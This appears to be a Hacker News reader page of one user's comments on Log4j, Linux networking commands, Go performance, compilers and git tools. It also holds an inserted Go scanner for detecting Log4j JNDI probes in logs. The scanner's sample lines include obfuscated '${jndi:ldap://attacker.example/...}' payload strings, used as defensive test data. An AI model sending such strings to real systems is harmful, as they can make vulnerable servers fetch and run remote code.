Readit News
peterwaller commented on Log4j: Between a rock and a hard place   crawshaw.io/blog/log4j... · Posted by u/todsacerdoti
forrestthewoods · 4 years ago
Can someone explain exactly what bad thing someone can do with this exploit?

I understand passing data to a second server and being able to exfiltrate environment vars. (Environment vars are evil.) But I feel like I’m missing a step. How does this let someone take over a machine? How can an attacker upload and run their own binary that can actually do real damage?

peterwaller · 4 years ago
It lets the hacker take over the machine because there are strings which are interpreted as (IIUC, I am not a Java engineer) variables within a class, and you can express a remote URL to load a class from, apparently (through something like a jndi://... ldap... URL), resulting in fetching code from somewhere and running it, in the service of writing a log message. This is apparently being exploited in the Minecraft ecosystem by simply writing chat messages containing the full exploit, which gets executed by both servers and clients.
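The mechanism described above (a `${jndi:...}` lookup embedded in attacker-controlled text, such as a chat message or a User-Agent header, that the logging library resolves) is something a defender wants to hunt for in logs. The following is an added example, not code from the linked article or from anyone in this thread: a small Go scanner that first undoes the nested-lookup obfuscation that was used in the wild to hide the literal string `jndi` (`${lower:j}`, `${upper:J}`, `${::-j}`, `${env:UNSET:-j}`) and then looks for the lookup. The sample lines, the player names and the host `attacker.example` are constructed placeholders, not real captures or indicators.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// innermostLookup matches a ${...} lookup with no further "${" inside it, so
// repeated substitution resolves nesting from the inside out.
var innermostLookup = regexp.MustCompile(`\$\{([^${}]*)\}`)

// jndiLookup is what we actually want to see once the string is normalised.
var jndiLookup = regexp.MustCompile(`(?i)\$\{jndi:`)

// Normalize resolves the nested-lookup tricks that hide "jndi" from naive
// pattern matches: ${lower:J}, ${upper:j}, ${::-j} (empty key plus a default
// value) and ${env:UNSET:-j}. Other lookups, including the jndi: one itself,
// are left untouched. The loop is bounded so a deliberately deep string
// cannot keep the scanner busy.
func Normalize(s string) string {
	for i := 0; i < 32; i++ {
		prev := s
		s = innermostLookup.ReplaceAllStringFunc(s, func(m string) string {
			body := m[2 : len(m)-1]
			lower := strings.ToLower(body)
			switch {
			case strings.HasPrefix(lower, "jndi:"):
				return m // never rewrite the thing we are looking for
			case strings.Contains(body, ":-"):
				return body[strings.Index(body, ":-")+2:] // ${key:-default} -> default
			case strings.HasPrefix(lower, "lower:"):
				return strings.ToLower(body[len("lower:"):])
			case strings.HasPrefix(lower, "upper:"):
				return strings.ToUpper(body[len("upper:"):])
			}
			return m // e.g. ${date:...}: not an obfuscation, leave it alone
		})
		if s == prev {
			return s
		}
	}
	return s
}

// IsJNDIProbe reports whether a log line contains a JNDI lookup after
// de-obfuscation. It is a hunting signal, not proof of compromise: it shows
// that someone sent the pattern, not that the server resolved it.
func IsJNDIProbe(line string) bool {
	return jndiLookup.MatchString(Normalize(line))
}

// ScanLines returns the lines that carry a JNDI lookup.
func ScanLines(lines []string) []string {
	var hits []string
	for _, l := range lines {
		if IsJNDIProbe(l) {
			hits = append(hits, l)
		}
	}
	return hits
}

// SampleLines are constructed for this example. attacker.example is a
// placeholder host, not a real indicator.
var SampleLines = []string{
	`GET / HTTP/1.1 ua="${jndi:ldap://attacker.example/x}"`,
	`GET / HTTP/1.1 ua="${${lower:j}ndi:${lower:l}dap://attacker.example/x}"`,
	`GET / HTTP/1.1 ua="${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/x}"`,
	`chat <player1>: ${${env:UNSET:-j}ndi:rmi://attacker.example/x}`,
	`GET / HTTP/1.1 ua="Mozilla/5.0 (compatible) ${date:yyyy}"`,
	`chat <player2>: gg, see you at ${notjndi:all}`,
}

func main() {
	for _, hit := range ScanLines(SampleLines) {
		fmt.Println("JNDI lookup:", hit)
		fmt.Println("  normalised:", Normalize(hit))
	}
}
```

Pattern matching like this is for detection and triage only; it is not a mitigation, because the lookup syntax allows more variants than any normaliser will anticipate. The fix is to run a Log4j version that does not resolve lookups from message text.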
peterwaller commented on Linux maintains bugs: The real reason ifconfig on Linux is deprecated (2018)   blog.farhan.codes/2018/06... · Posted by u/pjmlp
djsumdog · 6 years ago
I really do not like the default UI in ip. You have to remember a lot of weird stuff to get useful information. The default listing is compressed, hard to read, and noisy. Then I saw someone who had these aliases:

    alias ipa 'ip -br -color a'
    alias ipl 'ip -br -color link'
Night and day! I try to not use the aliases because I'm often on servers without them, but the options for brief and color with the command to list adapters or links at the end is one all sys admins should memorize. It returns output that isn't terrible.

peterwaller · 6 years ago
Nice hint, thanks :)

According to the manpage, -color can be shortened to -c and link shortened to `l`, as `addr` can be shortened to `a`. -br stands for -brief, which knowing makes it easier to remember.

  ip -br -c a
  ip -br -c l
Now I need the aliases less.

peterwaller commented on Simple techniques to optimise Go programs   stephen.sh/posts/quick-go... · Posted by u/sjwhitworth
nhooyr · 7 years ago
Your example doesn't seem right. Doesn't the Get perform an allocation anyway because you access the value of the pointer and store it in a new variable b? It's very likely b will escape to the heap.
peterwaller · 7 years ago
I agree with nhooyr's analysis. The interface{} will anyway transparently "contain" a pointer-to-the-[]byte, in other words, the []byte value itself will be heap allocated.

(Note for anyone new to this that the "[]byte-value" - we say "the byte slice" - is a distinct thing from the "values stored-in-the-byte-slice", which is a heap allocated backing array)

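The allocation nhooyr and peterwaller describe is easy to measure. Below is an added example, not code from the article or from either commenter: two `sync.Pool`s, one storing `[]byte` and one storing `*[]byte`, with `testing.AllocsPerRun` counting heap allocations per round trip. The payload is a constructed sample; the buffer size is arbitrary.

```go
package main

import (
	"fmt"
	"sync"
	"testing"
)

const bufSize = 4096

// slicePool stores []byte values. Converting a slice to interface{} copies
// its 24-byte header (pointer, len, cap) onto the heap, so every Put
// allocates even though the backing array itself is reused.
var slicePool = sync.Pool{
	New: func() interface{} { return make([]byte, 0, bufSize) },
}

// ptrPool stores *[]byte. A pointer fits directly in the interface's data
// word, so Get and Put do not allocate once the pool is warm.
var ptrPool = sync.Pool{
	New: func() interface{} {
		b := make([]byte, 0, bufSize)
		return &b
	},
}

// useSlicePool is the get-use-put pattern with a slice in the pool.
func useSlicePool(payload []byte) int {
	b := slicePool.Get().([]byte)
	b = append(b[:0], payload...)
	n := len(b)
	slicePool.Put(b) // allocates: []byte -> interface{} boxes the header
	return n
}

// usePtrPool is the same pattern with a pointer to the slice in the pool.
func usePtrPool(payload []byte) int {
	bp := ptrPool.Get().(*[]byte)
	*bp = append((*bp)[:0], payload...)
	n := len(*bp)
	ptrPool.Put(bp) // no allocation: the pointer is stored directly
	return n
}

// AllocsPerRoundTrip returns the (floored) average number of heap
// allocations per call of f. AllocsPerRun pins GOMAXPROCS to 1, so the
// pool's per-P cache is actually reused between iterations.
func AllocsPerRoundTrip(f func([]byte) int) float64 {
	payload := []byte("constructed sample payload") // constructed input
	return testing.AllocsPerRun(1000, func() { f(payload) })
}

func main() {
	fmt.Printf("[]byte in pool:  %.0f allocs/op\n", AllocsPerRoundTrip(useSlicePool))
	fmt.Printf("*[]byte in pool: %.0f allocs/op\n", AllocsPerRoundTrip(usePtrPool))
}
```

The `[]byte` version reports one allocation per round trip and the `*[]byte` version reports zero, which is the whole point of the pointer indirection: the pool only helps if the thing you hand it is pointer-sized.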
peterwaller commented on Live coding a basic Go compiler with LLVM in 20 minutes   github.com/pwaller/go2ll-... · Posted by u/ngaut
loeg · 7 years ago
Minor nitpick: "%d" format string for i64 isn't quite right on most (all?) platforms.
peterwaller · 7 years ago
Thanks for pointing this out, I fixed it.
peterwaller commented on Live coding a basic Go compiler with LLVM in 20 minutes   github.com/pwaller/go2ll-... · Posted by u/ngaut
rawland · 7 years ago
Does a recording of this talk exist?

Ran `go run .` and it ended with:

   [...]
   go: downloading github.com/mewmew/float v0.0.0-20181121163145-c0f786d7da73
   go: downloading github.com/pkg/errors v0.8.0
   go: downloading github.com/rickypai/natsort v0.0.0-20180124032556-f194e6bd5b0c
   @$const_str = global [16 x i8] c"Hello world %d\0A\00"

   declare void @printf(...)

   define void @main() {
   0:
       %0 = add i64 30, 12
       call void (...) @printf([16 x i8]* @$const_str, i64 %0)
       ret void
   }
   0>

peterwaller · 7 years ago
Unfortunately there isn't a recording, sorry!

What you're seeing is the LLVM IR for the program being printed. As another commenter noted, you can compile the program with make, which just runs `clang` on that IR.

peterwaller commented on Live coding a basic Go compiler with LLVM in 20 minutes   github.com/pwaller/go2ll-... · Posted by u/ngaut
awirth · 7 years ago
Note this uses golang.org/x/tools/go/packages and golang.org/x/tools/go/ssa to get to the go SSA AST and then generates some LLVM IR from that. It's not implementing a go parser or the transformation to SSA.
peterwaller · 7 years ago
Indeed, I had to take certain liberties in order to cram the talk into 20 minutes! I hope one of the takeaways was that you don't need to implement a parser to get started playing with this sort of thing.
peterwaller commented on Stabilizer: Statistically sound performance evaluation [pdf]   people.cs.umass.edu/~emer... · Posted by u/fanf2
titzer · 7 years ago
> why do those things have a (statistically significant?) impact in the first place?

In a word, caches. Not just the instruction / data cache, but also page faults and micro-architectural features like micro-op caches, instruction TLB entries, loop stream buffers, cache-line alignment, and aliasing in the branch predictor tables (which can also be thought of as caches).

peterwaller · 7 years ago
I suppose I was musing more along the lines of "why isn't this a solved problem". Clearly, it isn't an easy one or compilers would already take this into account and then the statistical variance would be reduced.
peterwaller commented on Stabilizer: Statistically sound performance evaluation [pdf]   people.cs.umass.edu/~emer... · Posted by u/fanf2
peterwaller · 7 years ago
Great, we can control for layout of code, heap, stack and other effects which mess with a performance measurement. However, why do those things have a (statistically significant?) impact in the first place? I guess that hints that with some engineering you could in principle get a speed boost by specifying the layout. "Worst case", you sample randomly and then pick the fastest arrangement, where it is statistically significant.

It could be that the problem arises when trying to measure very small speed increases (small relative differences => noise matters more). But in that case the fact that such a small speed increase is wiped out by random layout effects surely means that time would be better invested in finding a more performant layout?

peterwaller commented on 99% code coverage (2017)   rachelcarmena.github.io/2... · Posted by u/fagnerbrack
peterwaller · 7 years ago
Mutation testing is a neat idea I'd not heard of. Wonder how well it works in practice.

Someone's implemented a package for doing it with Go which looks good: https://github.com/zimmski/go-mutesting

peterwaller commented on Git-imerge: rebase/merge preserving history avoiding all-or-nothing   youtube.com/watch?v=FMZ2_... · Posted by u/peterwaller
peterwaller · 7 years ago
Just discovered this tool while doing a messy rebase, and can't believe it has had very little discussion I can find.

https://github.com/mhagger/git-imerge

No previous commentary on it so far on HN:

https://hn.algolia.com/?query=git%20imerge&dateRange=all

So, can anyone find any interesting discussion about this tool?

If you'd prefer reading rather than listening to the talk, here's an article which covers some of the same concepts:

https://wilsonmar.github.io/git-imerge/

The crux of it is that the tool does an efficient pairwise merge of all commits from the donor branch onto master. It can also be configured to run the test suite to detect conflicts.

Then you resolve conflicts in pairs of commits, which is only a small amount of work. The histories of your individual resolutions are preserved, so you can pause and resume the task.

u/peterwaller

Karma: 494 · Cake day: June 25, 2012
About
Based near Manchester and Liverpool, UK.

p@pwaller.net
